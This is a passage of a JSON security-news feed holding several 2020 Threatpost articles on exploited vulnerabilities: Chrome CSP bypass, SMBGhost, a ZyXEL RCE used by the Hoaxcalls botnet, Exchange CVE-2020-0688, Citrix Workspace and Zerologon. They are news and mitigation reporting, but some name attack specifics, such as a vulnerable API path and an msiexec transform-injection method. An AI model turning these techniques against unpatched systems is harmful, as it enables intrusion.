code.\n\nThe bug ([CVE-2020-6519](<https://bugs.chromium.org/p/chromium/issues/detail?id=1064676>)) is found in Chrome, Opera and Edge, on Windows, Mac and Android \u2013 potentially affecting billions of web users, according to PerimeterX cybersecurity researcher Gal Weizman. Chrome versions 73 (March 2019) through 83 are affected (84 was released in July and fixes the issue).\n\nCSP is a web standard that\u2019s meant to thwart certain types of attacks, including cross-site scripting (XSS) and data-injection attacks. CSP allows web admins to specify the domains that a browser should consider to be valid sources of executable scripts. A CSP-compatible browser will then only execute scripts loaded in source files received from those domains.\n\n[](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)\n\n\u201cCSP is the primary method used by website owners to enforce data-security policies to prevent malicious shadow-code executions on their website, so when browser enforcement can be bypassed, personal user data is at risk,\u201d Weizman explained, [in research](<https://www.perimeterx.com/tech-blog/2020/csp-bypass-vuln-disclosure/>) released on Monday.\n\nMost websites use CSP, the researcher noted, including internet giants like ESPN, Facebook, Gmail, Instagram, TikTok, WhatsApp, Wells Fargo and Zoom. Some notable names were not affected, including GitHub, Google Play Store, LinkedIn, PayPal, Twitter, Yahoo\u2019s Login Page and Yandex.\n\nTo exploit the vulnerability, an attacker first needs to gain access to the web server (through brute-forcing passwords or another method), in order to be able to modify the JavaScript code it uses. Then, the attacker could add a frame-src or child-src directive in the JavaScript to allow the injected code to load and execute it, bypassing the CSP enforcement and thus bypassing the site\u2019s policy, explained Weizman.\n\nBecause of the post-authentication aspect of the bug, it ranks as a medium-severity issue (6.5 out of 10 on the CvSS scale). However, because it affects CSP enforcement, this has vast implications,\u201d Weizman said, comparing it to having an issue with seatbelts, airbags and collision sensors.\n\n\u201c[Because of the] increased perception of safety, the damage caused in an accident when this equipment is faulty is much more severe,\u201d the researcher said. \u201cIn a similar way, website developers may allow third-party scripts to add functionality to their payment page, for example, knowing that CSP will restrict access to sensitive information. So, when CSP is broken, the risk for sites that relied on it is potentially higher than it would have been if the site never had CSP to begin with.\u201d\n\nThe vulnerability was present in Chrome browsers for more than a year before being fixed, so Weizman warned that the full implications of the bug are not yet known: \u201cIt is highly likely that we will learn of data breaches in the coming months that exploited it and resulted in the exfiltration of personally identifiable information (PII) for nefarious purposes.\u201d\n\nUsers should update their browsers to the latest versions to avoid falling victim to an exploit.\n\n_**Complimentary Threatpost Webinar**__: Want to learn more about Confidential Computing and how it can supercharge your cloud security? This webinar \u201c**[Cloud Security Audit: A Confidential Computing Roundtable](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**\u201d brings top cloud-security experts from Microsoft and __Fortanix together to explore how **Confidential Computing** is a game changer for securing dynamic cloud data and preventing IP exposure. Join us **[Wednesday Aug. 12 at 2pm ET](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>) **for this** FREE **live webinar with Dr. David Thaler, software architect, Microsoft and Dr Richard Searle, security architect, Fortanix \u2013 both with the Confidential Computing Consortium. **[Register Now](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**._\n", "cvss3": {}, "published": "2020-08-10T19:43:46", "type": "threatpost", "title": "Google Chrome Browser Bug Exposes Billions of Users to Data Theft", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135", "CVE-2020-6519"], "modified": "2020-08-10T19:43:46", "id": "THREATPOST:0ED2C20BB1821A77810AB2D29BB6A6A5", "href": "https://threatpost.com/google-chrome-bug-data-theft/158217/", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-10-14T22:24:14", "description": "The release of a fully functional proof-of-concept (PoC) exploit for a critical, wormable remote code-execution (RCE) vulnerability in Windows could spark a wave of cyberattacks, the feds have warned.\n\nMicrosoft patched the bug tracked as [CVE-2020-0796](<https://threatpost.com/wormable-unpatched-microsoft-bug/153632/>) back in March; also known as SMBGhost or CoronaBlue, it affects Windows 10 and Windows Server 2019. It exists in version 3.1.1 of the Microsoft Server Message Block (SMB) protocol \u2013 the same protocol that was targeted by the infamous [WannaCry ransomware](<https://threatpost.com/wannacry-infested-laptop-art-auction/144992/>) in 2017. SMB is a file-sharing system that allows multiple clients to access shared folders, and can provide a rich playground for malware when it comes to lateral movement and client-to-client infection.\n\nIn this case, the bug is an integer overflow vulnerability in the SMBv3.1.1 message decompression routine of the kernel driver srv2.sys.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nMicrosoft released its fix, KB4551762, as an update for Windows 10 (versions 1903 and 1909) and Windows Server 2019 (versions 1903 and 1909).\n\n\u201cAlthough Microsoft disclosed and provided updates for this vulnerability in March 2020, malicious cyber-actors are targeting unpatched systems with the new PoC, according to recent open-source reports,\u201d [warned](<https://www.us-cert.gov/ncas/current-activity/2020/06/05/unpatched-microsoft-systems-vulnerable-cve-2020-0796>) the Cybersecurity and Infrastructure Security Agency (CISA) on Friday. \u201cCISA strongly recommends using a firewall to block SMB ports from the internet and to apply patches to critical- and high-severity vulnerabilities as soon as possible.\u201d\n\nThe author behind the PoC, who goes by \u201cChompie,\u201d announced [his exploit](<https://github.com/chompie1337/SMBGhost_RCE_PoC/blob/master/README.md>) last week on Twitter. Several replies followed the original post, confirming that the exploit does in fact work.\n\n> This was a pain \ud83d\ude02. But I was able to achieve RCE with CVE 2020-0796 [#SMBGhost](<https://twitter.com/hashtag/SMBGhost?src=hash&ref_src=twsrc%5Etfw>). [pic.twitter.com/mvQ0YQt9GT](<https://t.co/mvQ0YQt9GT>)\n> \n> \u2014 chompie (@chompie1337) [June 1, 2020](<https://twitter.com/chompie1337/status/1267327689213517825?ref_src=twsrc%5Etfw>)\n\nThe PoC is notable because it achieves RCE \u2013 previous attempts to exploit SMBGhost have resulted only in denial of service or local privilege escalation, according to security analysts.\n\n\u201cWhile there have already been many public reports and PoCs of LPE (Local Privilege Escalation), none of them have shown that RCE is actually possible so far,\u201d said researchers at Ricerca Security, who did [a full writeup](<https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html>) of Chompie\u2019s exploit. \u201cThis is probably because remote kernel exploitation is very different from local exploitation in that an attacker can\u2019t utilize useful OS functions such as creating userland processes, referring to PEB, and issuing system calls.\u201d\n\nWindows 10 also has specific mitigations that make RCE a much more difficult thing to achieve, they noted.\n\n\u201cIn the latest version of Windows 10, RCE became extremely challenging owing to almost flawless address randomization,\u201d the researchers explained. \u201cIn a nutshell, we defeat this mitigation by abusing MDL (memory descriptor list)s, structs frequently used in kernel drivers for Direct Memory Access. By forging this struct, we make it possible to read from \u2018physical\u2019 memory. As basically no exception will occur when reading physical memory locations, we obtain a stable read primitive.\u201d\n\nTo protect networks, administrators should apply the updates; Microsoft also has offered [workaround guidance](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>) for those that can\u2019t patch. For instance, on the server side, companies can disable SMBv3 compression to block unauthenticated attackers, using a PowerShell command: Set-ItemProperty -Path \u201cHKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\u201d DisableCompression -Type DWORD -Value 1 -Force. No reboot is necessary.\n\nTo protect unpatched SMB clients, Microsoft [noted that it\u2019s possible](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>) to block traffic via firewalls and other methods. Companies can for instance simply block TCP port 445 at the enterprise perimeter firewall (though systems could still be vulnerable to attacks from within their enterprise perimeter).\n", "cvss3": {}, "published": "2020-06-08T15:54:41", "type": "threatpost", "title": "SMBGhost RCE Exploit Threatens Corporate Networks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0796", "CVE-2020-5135"], "modified": "2020-06-08T15:54:41", "id": "THREATPOST:A7995232CE91305C94B84BB400B1EA34", "href": "https://threatpost.com/smbghost-rce-exploit-corporate-networks/156391/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:26:09", "description": "A new variant of the Hoaxcalls botnet, which can be marshalled for large-scale distributed denial-of-service (DDoS) campaigns, is spreading via an unpatched vulnerability impacting the ZyXEL Cloud CNM SecuManager that was disclosed last month.\n\nThat\u2019s according to researchers at Radware, who also said that it\u2019s notable how quickly Hoaxcalls operators have moved to weaponize the ZyXel bug, which as of this time of writing, [has still not been addressed](<https://www.zyxel.com/us/en/support/security_advisories.shtml>) in a ZyXel advisory.\n\n**The Rise of Hoaxcalls**\n\nHoaxcalls first emerged in late March, as a variant of the [Gafgyt/Bashlite family](<https://threatpost.com/valve-source-engine-fortnite-servers-crippled-by-gafgyt-variant/149719/>); it\u2019s named after the domain used to host its malware, Hoaxcalls.pw.[](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)\n\nAccording to the [Palo Alto Unit 42](<https://unit42.paloaltonetworks.com/new-hoaxcalls-ddos-botnet/>) researchers who found it, the original sample featured three DDoS attack vectors: UDP, DNS and HEX floods; and, it was seen infecting devices through two vulnerabilities: A DrayTek Vigor2960 remote code-execution (RCE) vulnerability and a GrandStream Unified Communications remote SQL injection bug (CVE-2020-5722). The HTTP exploits for the bugs used a common User-Agent header value, \u201cXTC,\u201d which has been seen in previous [Mirai variant](<https://threatpost.com/new-mirai-variant-mukashi-targets-zyxel-nas-devices/153982/>) activity, according to researchers.\n\nIn early April, a new Hoaxcalls sample showed up on the scene and was picked up by Radware. It had added 16 new attack vectors for a total of 19, but it only propagated via the GrandStream CVE-2020-5722 bug and lacked the XTC header value. Within 48 hours of discovery, there were 15 unique IP addresses hosting the malware.\n\nThen, earlier this week, on April 20, Radware researchers spotted a third iteration of Hoaxcalls being disseminated from 75 different malware-hosting servers. It has the same number of attack vectors (19) as the second variant, and also uses the User-Agent \u201cXTC\u201d header seen in the initial version.\n\n\u201cWhile IoT botnet variants are common, these samples highlight not only the speed in which criminals move, but also the depth and scope of the campaigns run by DDoS operators,\u201d noted Radware researchers, in [an analysis](<https://security.radware.com/ddos-threats-attacks/threat-advisories-attack-reports/hoaxcalls-evolution/>) posted on Wednesday.\n\n**ZyXel RCE Bug**\n\nThe April 20 variant most notably uses an unpatched vulnerability in the ZyXEL Cloud CNM SecuManager, which is a network management appliance designed to provide an integrated console to monitor and manage security gateways.\n\nIn March, multiple bugs [were found to be riddling](<https://threatpost.com/flaws-zyxels-network-management-software/153554/>) the platform by security researchers Pierre Kim and Alexandre Torres. According to their report at the time, the vulnerable software includes Zyxel CNM SecuManager versions 3.1.0 and 3.1.1 \u2013 last updated in November 2018.\n\nThe bug that Hoaxcalls is [specifically leveraging](<https://pierrekim.github.io/blog/2020-03-09-zyxel-secumanager-0day-vulnerabilities.html#pre-auth-rce>) can be exploited via API calls that abuse the path \u201c/live/CPEManager/AXCampaignManager/delete_cpes_by_ids?Cpe_ids =\u201d according to Radware.\n\nDigging deeper, Kim and Torres characterized this bug as \u201cabusing an insecure API due to unsafe calls to eval():\u201d. When an API call is made, the output is stored in the \u201cAxess\u201d chroot, which the researchers said ultimately makes it possible to open up a \u201cconnect-back\u201d shell, providing access to the appliance.\n\nA chroot is an operation to change a root directory for a running process and its dependent directories on Unix operating systems,\n\n\u201cEven if the shell is within a chrooted environment, it is possible to break the chroot using a [local privilege escalation] LPE and the fact that /proc is mounted inside the chroot,\u201d Kim and Torres wrote.\n\nThe addition of the unpatched bug exploit only widens the number of routers and IoT devices that can be used by Hoaxcalls going forward, Radware researchers noted \u2014 adding that they expect the attack surface to continue to widen.\n\n\u201cThe campaigns performed by the actor or group behind XTC and Hoaxcalls include several variants using different combinations of propagation exploits and DDoS attack vectors,\u201d Radware researchers said in the analysis. \u201cIt is our opinion that the group behind this campaign is dedicated to finding and leveraging new exploits for the purpose of building a botnet that can be leveraged for large-scale DDoS attacks.\u201d\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _**[**_A Practical Guide to Securing the Cloud in the Face of Crisis_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)**_. Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_** for this sponsored webinar.**_\n", "cvss3": {}, "published": "2020-04-22T21:39:57", "type": "threatpost", "title": "Fast-Moving DDoS Botnet Exploits Unpatched ZyXel RCE Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135", "CVE-2020-5722"], "modified": "2020-04-22T21:39:57", "id": "THREATPOST:C22F323F8CA203A50435F11517317613", "href": "https://threatpost.com/fast-moving-ddos-botnet-unpatched-zyxel-rce-bug/155059/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:11:08", "description": "Over half of exposed Exchange servers are still vulnerable to a severe bug that allows authenticated attackers to execute code remotely with system privileges \u2013 even eight months after Microsoft issued a fix.\n\nThe vulnerability in question ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)) exists in the control panel of Exchange, Microsoft\u2019s mail server and calendaring server. The flaw, which stems from the server failing to properly create unique keys at install time, was fixed as part of Microsoft\u2019s [February Patch Tuesday](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>) updates \u2013 and [admins in March were warned](<https://threatpost.com/microsoft-exchange-server-flaw-exploited-in-apt-attacks/153527/>) that unpatched servers are being exploited in the wild by unnamed advanced persistent threat (APT) actors.\n\nHowever, new telemetry found that out of 433,464 internet-facing Exchange servers observed, at least 61 percent of Exchange 2010, 2013, 2016 and 2019 servers are still vulnerable to the flaw.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThere are two important efforts that Exchange administrators and infosec teams need to undertake: verifying deployment of the update and checking for signs of compromise,\u201d said Tom Sellers with Rapid7 [in a Tuesday analysis](<https://blog.rapid7.com/2020/04/06/phishing-for-system-on-microsoft-exchange-cve-2020-0688/>).\n\n> Speaking of Exchange, we took another look at Exchange CVE-2020-0688 (any user -> SYSTEM on OWA). \n> \n> It's STILL 61% unpatched. \n> \n> This is dangerous as hell and there is a reliable Metasploit module for it.\n> \n> See the UPDATED information on the ORIGINAL blog:<https://t.co/DclWb3T0mZ>\n> \n> \u2014 Tom Sellers (@TomSellers) [September 29, 2020](<https://twitter.com/TomSellers/status/1310991824828407808?ref_src=twsrc%5Etfw>)\n\nResearchers warned [in a March advisory](<https://www.volexity.com/blog/2020/03/06/microsoft-exchange-control-panel-ecp-vulnerability-cve-2020-0688-exploited/>) that unpatched servers are being exploited in the wild by unnamed APT actors. Attacks [first started in late February](<https://www.tenable.com/blog/cve-2020-0688-microsoft-exchange-server-static-key-flaw-could-lead-to-remote-code-execution?utm_source=charge&utm_medium=social&utm_campaign=internal-comms>) and targeted \u201cnumerous affected organizations,\u201d researchers said. They observed attackers leverage the flaw to run system commands to conduct reconnaissance, deploy webshell backdoors and execute in-memory frameworks, post-exploitation.\n\n[Previously, in April](<https://threatpost.com/serious-exchange-flaw-still-plagues-350k-servers/154548/>), Rapid7 researchers found that more than 80 percent of servers were vulnerable; out of 433,464 internet-facing Exchange servers observed, at least 357,629 were open to the flaw (as of March 24). Researchers used Project Sonar, a scanning tool, to analyze internet-facing Exchange servers and sniff out which were vulnerable to the flaw.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/09/30094515/cve-2020-0688_vulnerability_status.png>)\n\nExchange build number distribution status for flaw. Credit: Rapid7\n\nSellers urged admins to verify that an update has been deployed. The most reliable method to do so is by checking patch-management software, vulnerability-management tools or the hosts themselves to determine whether the appropriate update has been installed, he said.\n\n\u201cThe update for CVE-2020-0688 needs to be installed on any server with the Exchange Control Panel (ECP) enabled,\u201d he said. \u201cThis will typically be servers with the Client Access Server (CAS) role, which is where your users would access the Outlook Web App (OWA).\u201d\n\nWith the ongoing activity, admins should also determine whether anyone has attempted to exploit the vulnerability in their environment. The exploit code that Sellers tested left log artifacts in the Windows Event Log and the IIS logs (which contain HTTP server API kernel-mode cache hits) on both patched and unpatched servers: \u201cThis log entry will include the compromised user account, as well as a very long error message that includes the text invalid viewstate,\u201d he said.\n\nAdmins can also review their IIS logs for requests to a path under /ecp (usually /ecp/default.aspx), Sellers said, These should contain the string __VIEWSTATE and __VIEWSTATEGENERATOR \u2013 and will have a long string in the middle of the request that is a portion of the exploit payload.\n\n\u201cYou will see the username of the compromised account name at the end of the log entry,\u201d he said. \u201cA quick review of the log entries just prior to the exploit attempt should show successful requests (HTTP code 200) to web pages under /owa and then under /ecp.\u201d\n\n**[On October 14 at 2 PM ET](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)** Get the latest information on the rising threats to retail e-commerce security and how to stop them. **[Register today](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)** for this FREE Threatpost webinar, \u201c**[Retail Security: Magecart and the Rise of e-Commerce Threats.](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)**\u201d Magecart and other threat actors are riding the rising wave of online retail usage and racking up big numbers of consumer victims. Find out how websites can avoid becoming the next compromise as we go into the holiday season. Join us Wednesday, Oct. 14, 2-3 PM ET for this **[LIVE ](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)**webinar.\n", "cvss3": {}, "published": "2020-09-30T14:34:00", "type": "threatpost", "title": "Microsoft Exchange Servers Still Open to Actively Exploited Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0688", "CVE-2020-5135"], "modified": "2020-09-30T14:34:00", "id": "THREATPOST:EE9C0062A3E6400BAF159BCA26EABB34", "href": "https://threatpost.com/microsoft-exchange-exploited-flaw/159669/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:13:24", "description": "A Citrix Workspace vulnerability that was fixed in July has been found to have a secondary attack vector, which would allow cybercriminals to elevate privileges and remotely execute arbitrary commands under the SYSTEM account.\n\nThe bug (CVE-2020-8207), exists in the automatic update service of the Citrix Workspace app for Windows. It could allow local privilege-escalation as well as remote compromise of a computer running the app when Windows file sharing (SMB) is enabled, according to the [Citrix advisory](<https://support.citrix.com/article/CTX277662>).\n\nThe bug, though mostly fixed over the summer, was recently found to still allow attackers to abuse Citrix-signed MSI installers, according to Pen Test Partners (MSI is the filename extension of Windows Installer packages). This turns the bug into a remote command-line injection vulnerability.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe update service [originally relied](<https://www.pentestpartners.com/security-blog/raining-system-shells-with-citrix-workspace-app/>) on a faulty file hash within a JSON payload to determine if an update should proceed or not \u2013 allowing attackers to download their own code by exploiting the weak hash. To fix the problem, the latest update catalogs are now directly downloaded from the Citrix update servers, and the service \u201ccross-references the hashes with the file that is requested for install from the UpdateFilePath attribute,\u201d wrote researchers at Pen Test Partners, in a [Monday posting](<https://www.pentestpartners.com/security-blog/the-return-of-raining-system-shells-with-citrix-workspace-app/>).\n\n\u201cIf the update file is signed, valid and the hash of the update file matches one of the files within the manifest, the update file is executed to perform the upgrade,\u201d they explained.\n\nHowever, the patch didn\u2019t prevent remote connectivity to limit the attack surface.\n\n\u201cThe catalog includes executables and MSI files for installation,\u201d according to the firm. \u201cMSI files on the other hand cannot be executed in the same way as executable files, therefore the update service must handle these differently.\u201d\n\nIn looking at the installer-launch code, the researchers found that the application checks the extension of the file requested for update, and if it ends with MSI, it is assumed to be a Windows Installer file. Since the MSI file is checked for a valid signature and is cross-referenced with the current catalog, attackers can\u2019t directly install arbitrary MSI files.\n\nEven though the MSI files are signed and hashed to prevent modification, one of the features supported by the Windows Installer is MSI Transforms (MST).\n\n\u201cAs the name suggests, MSI Transforms support altering or transforming the MSI database in some way prior to installation,\u201d according to Pen Test Partners. \u201cDomain administrators commonly use this feature to push out MSI files within Active Directory environments that do not always work in an unattended way when executed on their own. For example, an MST might be created that will inject a product activation code prior to installing.\u201d\n\nTo apply an MST, users would specify the path to the transform file on the command line, which merges the main MSI file with changes that are present within the MST file during the installation process.\n\nTherein lies the bug: \u201cSince we can control the arguments passed to msiexec, we can include the path to a malicious Transform but using an official, signed Citrix MSI that is present within the catalog file,\u201d researchers said.\n\nMalicious Transforms can be generated with an existing tool called [Microsoft Orca](<https://docs.microsoft.com/en-us/windows/win32/msi/orca-exe>), they added, or with a custom tool. Then, to exploit the vulnerability, attackers would place the original MSI installer and the MST onto a network share ready for the victim machine.\n\n\u201cBoth the local and remote privilege-escalation methods can only be exploited while an instance of CitrixReceiverUpdate.exe is running on the victim host as before,\u201d the researchers concluded. \u201cI think the remote vector is easier to exploit this time around since you can place both MSI and MST files on a network share under the attacker\u2019s control.\u201d\n\nCitrix Workspace for Windows users should update their apps to [the latest version](<https://www.citrix.com/downloads/workspace-app/windows/>), containing a revised patch.\n", "cvss3": {}, "published": "2020-09-22T17:20:21", "type": "threatpost", "title": "Known Citrix Workspace Bug Open to New Attack Vector", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135", "CVE-2020-8207"], "modified": "2020-09-22T17:20:21", "id": "THREATPOST:85A0FA8DF1A997221A2F71AF5B8CC3E8", "href": "https://threatpost.com/citrix-workspace-new-attack/159459/", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:23:27", "description": "UPDATE\n\nThe \u201cperfect\u201d Windows vulnerability known as the Zerologon bug is getting a patch assist from two non-Microsoft sources, as they strive to fill in the gaps that the official fix doesn\u2019t address.\n\nThey roll out as Microsoft announced that it is tracking active exploitation in the wild. \u201cWe have observed attacks where public exploits have been incorporated into attacker playbooks,\u201d the firm [tweeted on Wednesday](<https://twitter.com/MsftSecIntel/status/1308941504707063808>).\n\nBoth Samba and 0patch have issued fixes for CVE-2020-1472, an privilege-escalation bug which, [as previously reported](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>), stems from the Netlogon Remote Protocol, available on Windows domain controllers, which is used for various tasks related to user- and machine-authentication.\n\nExploiting the bug allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services, according to Microsoft. A proof-of-concept exploit [was just released](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>) for the issue, which is a critical flaw rating 10 out of 10 on the CvSS severity scale.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis attack has a huge impact: It basically allows any attacker on the local network (such as a malicious insider or someone who simply plugged in a device to an on-premise network port) to completely compromise the Windows domain,\u201d said researchers with Secura, [in a whitepaper](<https://www.secura.com/pathtoimg.php?id=2055>) published earlier this month.\n\nMicrosoft did issue a [patch for the flaw in August](<https://threatpost.com/0-days-active-attack-bugs-patched-microsoft/158280/>), during its regularly scheduled Patch Tuesday updates. However, not all systems are compatible with the fix, according to Mitja Kolsec, CEO and co-founder at 0patch, which issued a \u201cmicropatch\u201d of its own for the bug.\n\n\u201cOur micropatch was made for Windows Server 2008 R2, which reached end-of-support this January and stopped receiving Windows updates,\u201d Kolsec told Threatpost. \u201cMany organizations are still using this server and the only way for it to get extended security updates from Microsoft was to move it to Azure (cloud) \u2014 which is an unacceptable option for most organizations.\u201d\n\nThe micropatch is logically identical to Microsoft\u2019s fix, he explained in a recent [blog post](<https://blog.0patch.com/2020/09/micropatch-for-zerologon-perfect.html>): \u201cWe injected it in function NetrServerAuthenticate3 in roughly the same place where Microsoft added the call to NlIsChallengeCredentialPairVulnerable, but since the latter doesn\u2019t exist in old versions of netlogon.dll, we had to implement its logic in our patch.\u201d\n\n0patch is also porting the micropatch to various still-supported Windows Servers for customers who for various reasons can\u2019t apply the Microsoft patch, he added.\n\nMeanwhile, it turns out that Samba, a file-sharing utility for swapping materials between Linux and Windows systems, also relies on the Netlogon protocol, and thus suffers from the vulnerability.\n\nThe bug exists when Samba is used as domain controller only (most seriously the Active Directory DC, but also the classic/NT4-style DC), it said in [an advisory](<https://www.samba.org/samba/security/CVE-2020-1472.html>) this week. It added, \u201cinstallations running Samba as a file server only are not directly affected by this flaw, though they may need configuration changes to continue to talk to domain controllers.\u201d\n\nThe company noted that versions 4.8 and above of Samba are not vulnerable unless they have the smb.conf lines \u2018server schannel = no\u2019 or \u2018server schannel = auto\u2019. Samba versions 4.7 and below are vulnerable unless they have \u2018server schannel = yes\u2019 in the smb.conf.\n\nLast Friday, the U.S. Cybersecurity and Infrastructure Security Agency [issued an emergency directive](<https://threatpost.com/dire-patch-warning-zerologon/159404/>) for federal agencies to patch against the bug. Federal agencies that haven\u2019t patched their Windows Servers against the Zerologon vulnerability by Monday Sept. 21 at 11:59 pm EDT are in violation. And in light of the active, in-the-wild exploitation flagged by Microsoft, patching should be at the top of the to-do list for all organizations.\n\n> Microsoft is actively tracking threat actor activity using exploits for the CVE-2020-1472 Netlogon EoP vulnerability, dubbed Zerologon. We have observed attacks where public exploits have been incorporated into attacker playbooks.\n> \n> \u2014 Microsoft Security Intelligence (@MsftSecIntel) [September 24, 2020](<https://twitter.com/MsftSecIntel/status/1308941504707063808?ref_src=twsrc%5Etfw>)\n\n_**This story was updated at 11 a.m. ET on Sept. 23 to include information on active exploitation.**_\n", "cvss3": {}, "published": "2020-09-23T21:05:54", "type": "threatpost", "title": "Zerologon Patches Roll Out Beyond Microsoft", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472", "CVE-2020-5135"], "modified": "2020-09-23T21:05:54", "id": "THREATPOST:A1A1E1AC8DB384C8FA2988F9A9121141", "href": "https://threatpost.com/zerologon-patches-beyond-microsoft/159513/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:20:59", "description": "The Google Chrome web browser has a high-severity vulnerability that could be used to execute arbitrary code, researchers say. The flaw has been fixed in the Chrome 85 stable channel, set to be rolled out to users [this week](<https://www.chromestatus.com/features/schedule>).\n\nThe flaw (CVE-2020-6492) is a use-after-free vulnerability in the WebGL (Web Graphics Library) component of Chrome browser. This component is a Javascript API that lets users render 2D and 3D graphics within their browser. This specific flaw stems from the WebGL component failing to properly handle objects in memory.\n\n\u201cAn adversary could manipulate the memory layout of the browser in a way that they could gain control of the use-after-free exploit, which could ultimately lead to arbitrary code execution,\u201d according to Jon Munshaw with Cisco Talos [in a Monday analysis](<https://blog.talosintelligence.com/2020/08/vuln-spotlight-chrome-use-free-aug-2020.html>).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe flaw ranks 8.3 out of 10 on the CVSS scale, making it a high-severity vulnerability. Researchers said this vulnerability specifically exists in ANGLE, a compatibility layer between OpenGL and Direct3D used on Windows by Chrome browser and other project.\n\nAccording to the proof-of-concept (PoC) attack outlined by researchers, the issue exists in a function of ANGLE, called \u201cState::syncTextures.\u201d This function is responsible for checking if texture has any \u201cDirtyBits.\u201d These are \u201cbitsets\u201d indicating if a specific state value, associated with a block of computer memory, has been changed.\n\nAn attacker can execute vulnerable code via a function called drawArraysInstanced. When the texture object tries to syncState (via the \u201cTexture::syncState function) it creates a use after free condition. Use after free stems from attempts to access memory after it has been freed, which can cause a program to crash or can potentially result in the execution of arbitrary code.\n\nThreatpost has reached out to Cisco for further details of the flaw, including how a real-world attack scenario would play out.\n\nThe flaw, which was reported to Cisco May 19, impacts Google Chrome versions 81.0.4044.138 (Stable), 84.0.4136.5 (Dev) and 84.0.4143.7 (Canary). A fix became available via Google Chrome\u2019s Beta channel release, but it has been officially rolled out to the Stable channel for version 85.0.4149.0 that will roll out on Monday. The stable channel is the Chrome version that users generally get; while the Beta channel allows specific users to preview upcoming Chrome features before they\u2019re released and give Google feedback.\n\nThe bug comes after a vulnerability was found in [Google\u2019s Chromium-based browsers](<https://threatpost.com/google-chrome-bug-data-theft/158217/>) earlier in August, which could allow attackers to bypass the Content Security Policy (CSP) on websites, in order to steal data and execute rogue code. The bug ([CVE-2020-6519](<https://bugs.chromium.org/p/chromium/issues/detail?id=1064676>)) is found in Chrome, Opera and Edge, on Windows, Mac and Android \u2013 potentially affecting billions of web users, according to PerimeterX cybersecurity researcher Gal Weizman. Chrome versions 73 (March 2019) through 83 are affected (84 was released in July and fixes the issue).\n\n_It\u2019s the age of remote working, and businesses are facing new and bigger cyber-risks \u2013 whether it\u2019s collaboration platforms in the crosshairs, evolving insider threats or issues with locking down a much broader footprint. Find out how to address these new cybersecurity realities with our complimentary _[_Threatpost eBook_](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)**_, 2020 in Security: Four Stories from the New Threat Landscape_**_, presented in conjunction with Forcepoint. We redefine \u201csecure\u201d in a work-from-home world and offer compelling real-world best practices. _[_Click here to download our eBook now_](<https://threatpost.com/ebooks/2020-in-security-four-stories-from-the-new-threat-landscape/?utm_source=ART&utm_medium=articles&utm_campaign=fp_ebook>)_._\n", "cvss3": {}, "published": "2020-08-24T21:31:00", "type": "threatpost", "title": "Google Fixes High-Severity Chrome Browser Code Execution Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-5135", "CVE-2020-6492", "CVE-2020-6519"], "modified": "2020-08-24T21:31:00", "id": "THREATPOST:3A306ADED5369A8AA74DD95614F98FBD", "href": "https://threatpost.com/google-fixes-high-severity-chrome-browser-code-execution-bug/158600/", "cvss": {"score": 4.3, "vector": 